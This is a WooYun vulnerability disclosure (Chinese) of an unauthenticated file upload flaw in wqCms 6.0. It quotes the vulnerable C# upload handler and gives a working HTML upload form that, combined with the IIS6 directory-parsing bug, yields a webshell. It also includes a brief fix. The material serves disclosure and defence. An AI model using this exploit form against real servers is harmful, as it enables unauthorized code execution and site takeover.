当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065399

漏洞标题:wqCms6.0 文件上传获取webshell(服务器限制)

相关厂商:wangqi.com

漏洞作者: what_news

提交时间:2014-06-20 09:04

修复时间:2014-09-15 09:06

公开时间:2014-09-15 09:06

漏洞类型:文件上传导致任意代码执行

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-20: 细节已通知厂商并且等待厂商处理中
2014-06-25: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-08-19: 细节向核心白帽子及相关领域专家公开
2014-08-29: 细节向普通白帽子公开
2014-09-08: 细节向实习白帽子公开
2014-09-15: 细节向公众公开

简要描述:

wqcms最新版 获取webshell 无需登录 默认配置
求顺便帮这个也审核了吧
http://wooyun.org/bugs/wooyun-2014-065309/trace/b854f00000a861e49bd22dd330fc350a

详细说明:

结合iis6解析漏洞 就可以获取webshell了
admin_wqSwfUpload.aspx
源码如下

public void Page_Init(object sender, EventArgs e)
{
    base.mustLogin = false; //无需登录
    base.Page_Init(sender, e);
}


public void Page_Load(object sender, EventArgs e)
{
    this.method_1();
}
private void method_1()
{
    string str = string.Format("upload/{0}/", DateTime.Now.ToString("yyyy-MM"));
    string s = string.Empty;
    if (!string.IsNullOrEmpty(base.Request.QueryString["file"]))//file可自由控制
    {
        str = string.Format("{0}/{1}", str, base.Request.QueryString["file"]);
    }
    bool flag = false;
    HttpPostedFile file = base.Request.Files["Filedata"];
    string str5 = Path.GetExtension(file.FileName).ToLower();
    string[] strArray = new string[] { ".gif", ".png", ".jpeg", ".jpg" };
    for (int i = 0; i < strArray.Length; i++)
    {
        if (str5 == strArray[i])
        {
            flag = true;
        }
    }
    if (flag)
    {
        if (!Directory.Exists(base.Server.MapPath(str)))
 //这里判断目录是否存在不存在就创建目录 由于file我们可以自己控制 如果目录为1.asp 那么等下上传图片就可以跟进解析漏洞获取webshell了
        {
            Directory.CreateDirectory(base.Server.MapPath(str));
        }
        Random random = new Random();
        string str6 = DateTime.Now.ToString("yyyyMMddHHmm") + random.Next(0x2710).ToString();
        str = string.Format("{0}{1}{2}", str, str6, str5);
        s = str;
        file.SaveAs(base.Server.MapPath(str)); //保存
        FileInfo info = new FileInfo(base.Server.MapPath(str));
        if (info.Length < 0x7d000L)
        {
            string input = WbIO.ReadFile(base.Server.MapPath(str));
            string str3 = str5.TrimStart(new char[] { '.' });
            if ((((str3 != "html") && (str3 != "txt")) && ((str3 != "htm") && (str3 != "asp"))) && (((str3 != "aspx") && (str3 != "php")) && Regex.IsMatch(input, "<html|<script|<object", RegexOptions.Singleline | RegexOptions.Compiled | RegexOptions.IgnoreCase)))
            {
                File.Delete(base.Server.MapPath(str));
                return;
            }
        }
        info = null;
    }
    base.Response.StatusCode = 200;
    base.Response.Write(s);
}

漏洞证明:

61.png


cms6.0版本
这里就本地测试吧
利用代码如下

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>upload</title>
</head>
<body>
<form method="post" action="http://192.168.1.104/admin_wqSwfUpload.aspx?file=3.asp/" enctype="multipart/form-data"" >
<input type="file" name="Filedata" />
<input type="submit" name="tijiao"  value="confirm"/>
</form>
</body>
</html>


上传后

62.png


文件名还是很容易获取的

63.png


修复方案:

file设置成绝对值不要让用户输入

版权声明:转载请注明来源 what_news@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-15 09:06

厂商回复:

最新状态:

暂无